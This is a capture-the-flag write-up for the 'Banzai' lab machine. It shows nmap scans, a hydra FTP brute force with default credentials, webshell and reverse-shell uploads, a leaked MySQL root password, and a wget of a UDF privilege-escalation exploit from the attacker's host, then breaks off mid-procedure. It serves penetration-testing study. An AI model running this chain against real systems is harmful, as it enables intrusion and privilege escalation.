Banzai Write up

Posted Dec 2, 2023 Updated Mar 19, 2024

By thehunt1s0n 3 min read

Welcome to my Banzai Write-up

Recon

$ sudo nmap -sSVC -A -oA nmap 192.168.191.56

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 20:45 EDT
Nmap scan report for 192.168.191.56
Host is up (0.062s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp        vsftpd 3.0.3
22/tcp   open   ssh        OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
|   256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
|_  256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
25/tcp   open   smtp       Postfix smtpd
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
5432/tcp open   postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=banzai
| Subject Alternative Name: DNS:banzai
| Not valid before: 2020-06-04T14:30:35
|_Not valid after:  2030-06-02T14:30:35
8080/tcp open   http       Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
Device type: general purpose|firewall|printer|WAP

ALL PORTS SCAN

$ nmap -Pn -p- --min-rate=10000 192.168.191.56

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 20:53 EDT
Nmap scan report for 192.168.191.56
Host is up (0.068s latency).
Not shown: 65528 filtered tcp ports (no-response)
PORT     STATE  SERVICE

20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
25/tcp   open   smtp
5432/tcp open   postgresql
8080/tcp open   http-proxy
8295/tcp open   unknown

UDP PORTS SCAN

$ sudo nmap -sU -Pn --min-rate=5000 192.168.191.56

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 20:54 EDT
Nmap scan report for 192.168.191.56
Host is up.
All 1000 scanned ports on 192.168.191.56 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 11.98 seconds

No udp ports are open

Port 8080:

http://192.168.191.56:8080/

Port 8295:

http://192.168.191.56:8295/

There is no initial access from this site

Initial Foothold

FTP BruteForce:

$ hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.191.56 ftp

NOTE: make sure to connect as active mode (-A) because passive mode doesn’t work

$ ftp -A 192.168.191.56

User:admin Pass:admin

let’s get a php webshell from https://www.revshells.com/

ftp> put webshell.php

http://192.168.191.56:8295/webshell.php

Let’s get a rev shell by uploading a shell.php

http://192.168.191.56:8295/shell.php

Privilege Escalation

www-data@banzai:/var/www$ cat config.php

www-data@banzai:/var/www$ mysql -u root -p main

Seems like the DB ‘main’ is not known , let’s go with no DB or mysql DB

‘No DB’ mysql command:

www-data@banzai:/var/www$ mysql -u root -p

EscalateRaftHubris123

mysql> status;

This version is vulnerable to UDF: https://www.exploit-db.com/exploits/1518

Here’s how to exploit it : https://steflan-security.com/linux-privilege-escalation-exploiting-user-defined-functions/

Upload the exploit :

www-data@banzai:/var/www$ cd /dev/shm

www-data@banzai:/dev/shm$ wget http://192.168.45.158:8080/1518.c

Compile it :

www-data@banzai:/dev/shm$ gcc -g -c 1518.c -o raptor_udf2.o -fPIC

www-data@banzai:/dev/shm$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

From within MySQL, the following commands can be used to create a new table containing the path to the shared object, copying the same file under /usr/lib/mysql/plugin and creating a “do_system” function